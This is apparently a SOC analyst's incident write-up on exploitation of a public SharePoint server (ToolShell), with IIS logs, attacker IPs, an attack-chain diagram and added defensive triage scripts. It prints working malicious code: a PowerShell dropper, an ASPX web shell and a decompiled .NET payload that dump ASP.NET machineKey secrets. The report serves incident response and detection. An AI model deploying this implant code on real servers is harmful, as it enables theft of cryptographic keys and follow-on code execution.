====================
== Alert Overload ==
====================
Tales from a SOC analyst

ToolShell

Note: This doesn’t add much to the reference article, but covers the events as we saw them.

Reference: SharePoint Under Siege

Starting on July 18th at 8:53:55.224 CDT, the SOC was alerted to several detections and blocks of encoded PowerShell processes executing on a SharePoint front-end server. This server was publicly accessible and not behind the Web Application Firewall (WAF). It was confirmed that direct IP access was allowed. Later investigation revealed that the first signs of activity on the affected endpoint occurred on July 17th at 04:54:50 CDT.

The incident started with a POST request to /_layouts/15/ToolPane.aspx. Unfortunately, the server was not configured to log POST data, only the default IIS log fields. However, this POST request led to the exploitation of w3wp.exe, the IIS worker process that handles requests sent to the server. In this incident, w3wp.exe was abused to launch a cmd.exe process that started the detected PowerShell command.

Attack Chain

There was a logging gap identified for the first detection. The following is built from the second detection, which came in at 09:37:21 CDT.

IIS Log entry

The first observed POST request to the affected endpoint.

Timestamp                Source IP        Method  URL                         Status Code
2025-07-18 09:37:54 CDT  107.191.58.76    POST    /_layouts/15/ToolPane.aspx  200

EDR Detection

Encoded PowerShell

```PowerShell
powershell -EncodedCommand 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
```

Decoded

```PowerShell
powershell  -EncodedCommand $base64String = "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"
$destinationFile = "C:\PROGRA~1\COMMON~1\MICROS~1\WEBSER~1\16\TEMPLATE\LAYOUTS\spinstall0.aspx"
$decodedBytes = [System.Convert]::FromBase64String($base64String)
$decodedContent = [System.Text.Encoding]::UTF8.GetString($decodedBytes)
$decodedContent | Set-Content -Path $destinationFile -ErrorAction Stop
```

This PowerShell code attempts to write the following file to C:\PROGRA~1\COMMON~1\MICROS~1\WEBSER~1\16\TEMPLATE\LAYOUTS\spinstall0.aspx:

```aspx
<%@ Import Namespace="System.Diagnostics" %>
<%@ Import Namespace="System.IO" %>
<script runat="server" language="c#" CODEPAGE="65001">
    public void Page_load()
    {
        var sy = System.Reflection.Assembly.Load("System.Web, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a");
        var mkt = sy.GetType("System.Web.Configuration.MachineKeySection");
        var gac = mkt.GetMethod("GetApplicationConfig", System.Reflection.BindingFlags.Static | System.Reflection.BindingFlags.NonPublic);
        var cg = (System.Web.Configuration.MachineKeySection)gac.Invoke(null, new object[0]);
        Response.Write(cg.ValidationKey+"|"+cg.Validation+"|"+cg.DecryptionKey+"|"+cg.Decryption+"|"+cg.CompatibilityMode);
    }
</script>
```

This file would dump the ASP.NET machineKey secrets (the validation and decryption keys and their algorithms), which could then be used in a ViewState code injection attack. See the reference article for more in-depth information on this.
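The decoding step the SOC performed on the EDR detection, reproduced as an added example that is not part of the original post: it pulls the base64 out of a `-EncodedCommand` argument, decodes it as UTF-16LE (the encoding PowerShell actually uses, which is why a plain UTF-8 decode comes out as garbage), and reports which dropper indicators from this incident the script matches. The sample command line is constructed here with a placeholder inner blob; the pattern names and `triage` helper are this example's own.

```python
import base64
import re

# Indicators taken from the decoded dropper above: the SharePoint LAYOUTS path,
# Set-Content, an inner base64 decode, and an .aspx file name.
DROPPER_PATTERNS = {
    "writes_into_layouts": re.compile(r"TEMPLATE\\LAYOUTS\\", re.IGNORECASE),
    "uses_set_content": re.compile(r"\bSet-Content\b", re.IGNORECASE),
    "decodes_base64_blob": re.compile(r"FromBase64String", re.IGNORECASE),
    "drops_aspx": re.compile(r"\.aspx\b", re.IGNORECASE),
}


def decode_encoded_command(cmdline: str) -> str:
    """Return the script behind 'powershell -EncodedCommand <b64>'.

    PowerShell encodes the argument as base64 of UTF-16LE text, not UTF-8.
    Accepts the -e / -enc / -EncodedCommand spellings.
    """
    m = re.search(r"-e(?:nc(?:odedcommand)?)?\s+([A-Za-z0-9+/=]+)", cmdline, re.IGNORECASE)
    if not m:
        raise ValueError("no -EncodedCommand argument found")
    return base64.b64decode(m.group(1)).decode("utf-16-le")


def triage(cmdline: str) -> dict:
    """Decode the command line and report which dropper indicators it matches."""
    script = decode_encoded_command(cmdline)
    hits = [name for name, pat in DROPPER_PATTERNS.items() if pat.search(script)]
    return {"script": script, "hits": hits, "suspicious": "writes_into_layouts" in hits}


# Constructed sample mirroring the structure of the decoded command above;
# the inner base64 string is a placeholder, not the real implant.
SAMPLE_SCRIPT = (
    '$base64String = "PLACEHOLDER_BASE64_BLOB"\n'
    '$destinationFile = "C:\\PROGRA~1\\COMMON~1\\MICROS~1\\WEBSER~1\\16\\TEMPLATE\\LAYOUTS\\spinstall0.aspx"\n'
    '$decodedBytes = [System.Convert]::FromBase64String($base64String)\n'
    '$decodedContent = [System.Text.Encoding]::UTF8.GetString($decodedBytes)\n'
    '$decodedContent | Set-Content -Path $destinationFile -ErrorAction Stop\n'
)
SAMPLE_CMDLINE = "powershell -EncodedCommand " + base64.b64encode(
    SAMPLE_SCRIPT.encode("utf-16-le")).decode("ascii")

if __name__ == "__main__":
    result = triage(SAMPLE_CMDLINE)
    print(result["script"])
    print("hits:", result["hits"], "suspicious:", result["suspicious"])
```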

Complete Attack Chain

+--------------------+
|  External Attacker |
+--------------------+
          |
          |  POST request
          |  URL: /_layouts/15/ToolPane.aspx
          |  Time: 2025-07-18 09:37:54 CDT
          |  Source IP: 107.191.58.76
          v
+---------------------+
|    IIS (w3wp.exe)   |
|  Handles the POST   |
+---------------------+
          |
          |  Spawns cmd.exe
          v
+---------------------+
|      cmd.exe        |
|  Executes encoded   |
|   PowerShell blob   |
+---------------------+
          |
          |  Decodes & runs PowerShell
          v
+-----------------------------+
|   powershell.exe (EDR hit) |
|   Writes file:             |
|   C:\...\spinstall0.aspx   |
+-----------------------------+
          |
          |  .aspx file contains:
          |  - C# code to extract:
          |    * ValidationKey
          |    * Validation
          |    * DecryptionKey
          |    * Decryption
          |    * CompatibilityMode
          |
          |  --> Attempt blocked by security controls
          v
+----------------------------------------------+
| If the implant had been successfully         |
| deployed, the keys would be accessible       |
| via a GET request to spinstall0.aspx         |
+----------------------------------------------+

Intel and Monitoring

Currently, the SOC is monitoring the IIS servers for POST requests to the affected endpoint. Monitoring will continue until the servers can be patched and security controls can be implemented.

The SOC has observed POST requests to the affected endpoint from the following addresses:

Source IP        First Request            Last Request             Total Requests
96.9.125.147     2025-07-17 04:54:50 CDT  2025-07-17 07:22:51 CDT  5
107.191.58.76    2025-07-18 09:37:54 CDT  2025-07-18 12:42:53 CDT  5
104.238.159.149  2025-07-18 23:19:50 CDT  2025-07-19 02:3:29 CDT   5

Each POST request was shortly followed by a GET request for the implant file, with the sole exception of 96.9.125.147. The POST requests on July 17th may have been initial scanning attempts or rudimentary attempts at exploiting the server. No POST data was captured for these events. However, the servers did not log any file creation events during this time, so it is unlikely any exploit attempts were successful.
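The monitoring described above, as an added example that is not part of the original post: a small parser over IIS W3C logs that builds the same per-source view (first request, last request, count of POSTs to ToolPane.aspx) and flags sources whose POST was followed within a short window by a GET for spinstall0.aspx, the pairing this write-up uses to separate likely exploitation from scanning. The log excerpt, IPs and times are constructed; the field list is the IIS default, and IIS writes W3C logs in UTC by default, so timestamps will not line up with CDT EDR times unless converted.

```python
from datetime import datetime

TOOLPANE = "/_layouts/15/ToolPane.aspx"
IMPLANT = "/_layouts/15/spinstall0.aspx"

# Constructed IIS W3C excerpt with the default field set (UTC timestamps).
# IPs and times are illustrative, not the incident's log data.
SAMPLE_LOG = """\
#Fields: date time s-ip cs-method cs-uri-stem cs-uri-query s-port cs-username c-ip cs(User-Agent) cs(Referer) sc-status sc-substatus sc-win32-status time-taken
2025-07-17 09:54:50 10.0.0.5 POST /_layouts/15/ToolPane.aspx - 443 - 203.0.113.9 python-requests/2.31 - 200 0 0 220
2025-07-18 14:37:54 10.0.0.5 POST /_layouts/15/ToolPane.aspx - 443 - 198.51.100.10 Mozilla/5.0 - 200 0 0 312
2025-07-18 14:37:56 10.0.0.5 GET /_layouts/15/spinstall0.aspx - 443 - 198.51.100.10 Mozilla/5.0 - 404 0 2 15
2025-07-18 14:40:01 10.0.0.5 GET /_layouts/15/start.aspx - 443 - 192.0.2.7 Mozilla/5.0 - 200 0 0 40
"""


def parse_iis(text):
    """Yield one dict per W3C record, keyed by the names in the #Fields line."""
    fields = None
    for line in text.splitlines():
        if line.startswith("#Fields:"):
            fields = line.split()[1:]
            continue
        if not line or line.startswith("#") or fields is None:
            continue
        parts = line.split()
        if len(parts) != len(fields):
            continue  # malformed record; skip rather than misalign columns
        rec = dict(zip(fields, parts))
        rec["ts"] = datetime.strptime(rec["date"] + " " + rec["time"], "%Y-%m-%d %H:%M:%S")
        yield rec


def summarize(text, follow_window_s=120):
    """Per source IP: ToolPane POST count, first/last time, and whether the same
    source fetched the implant file within follow_window_s seconds of a POST."""
    recs = sorted(parse_iis(text), key=lambda r: r["ts"])
    summary = {}
    for i, r in enumerate(recs):
        if r["cs-method"] != "POST" or r["cs-uri-stem"].lower() != TOOLPANE.lower():
            continue
        s = summary.setdefault(r["c-ip"], {"count": 0, "first": r["ts"], "last": r["ts"], "implant_get": False})
        s["count"] += 1
        s["first"], s["last"] = min(s["first"], r["ts"]), max(s["last"], r["ts"])
        for f in recs[i + 1:]:
            if (f["ts"] - r["ts"]).total_seconds() > follow_window_s:
                break
            if f["c-ip"] == r["c-ip"] and f["cs-method"] == "GET" and f["cs-uri-stem"].lower() == IMPLANT.lower():
                s["implant_get"] = True
    return summary
```

Sources with `implant_get` set are the ones to escalate first; a lone POST with no follow-up GET looks like the July 17th scanning pattern.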

VirusTotal Threat Graph

The embed doesn’t work :(

VirusTotal Graph

Updates

Updated attacker IPs - 2025-07-21 @ 14:58 CDT


Updated behavior - 2025-07-21 @ 17:19 CDT

The SOC was alerted to a reflective load of a .NET binary by w3wp.exe. Investigation and decompilation revealed it to be the ToolShell payload (dumping secrets). VirusTotal

Correlated events

Timestamp  Event                   Description
11:10:51   ToolShell POST request  IIS log, no data captured. Likely sent payload.
11:10:52   Script scan             Content consistent with a .NET DLL. Extracted and decompiled to reveal the ToolShell payload.
11:10:54   Reflective load         Loaded into w3wp.exe.

Contents of decompilation

```csharp
// Main, Version=1.0.0.0, Culture=neutral, PublicKeyToken=null
// Program
using System;
using System.Reflection;
using System.Web;
using System.Web.Configuration;

public class Program
{
    public Program()
    {
        try
        {
            HttpContext current = HttpContext.Current;
            try
            {
                Assembly assembly = Assembly.Load("System.Web, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a");
                Type type = assembly.GetType("System.Web.Configuration.MachineKeySection");
                MethodInfo method = type.GetMethod("GetApplicationConfig", BindingFlags.Static | BindingFlags.NonPublic);
                MachineKeySection machineKeySection = (MachineKeySection)method.Invoke(null, new object[0]);
                current.Response.Write(machineKeySection.ValidationKey + "|" + machineKeySection.Validation.ToString() + "|" + machineKeySection.DecryptionKey + "|" + machineKeySection.Decryption + "|" + machineKeySection.CompatibilityMode);
            }
            catch (Exception ex)
            {
                current.Response.Write(ex.Message);
            }
            current.Response.End();
        }
        catch (Exception)
        {
        }
    }

    private static void Main(string[] args)
    {
    }
}
```

Updated IOCs - 2025-07-21 @ 23:09 CDT

I’ve created a VirusTotal Collection for IOC tracking. This collection has 15 IP addresses observed attempting ToolShell exploits. It also includes the above DLL.

Updated IOCs - 2025-07-22 @ 09:40 CDT

IOCs are still being tracked in the VirusTotal Collection.
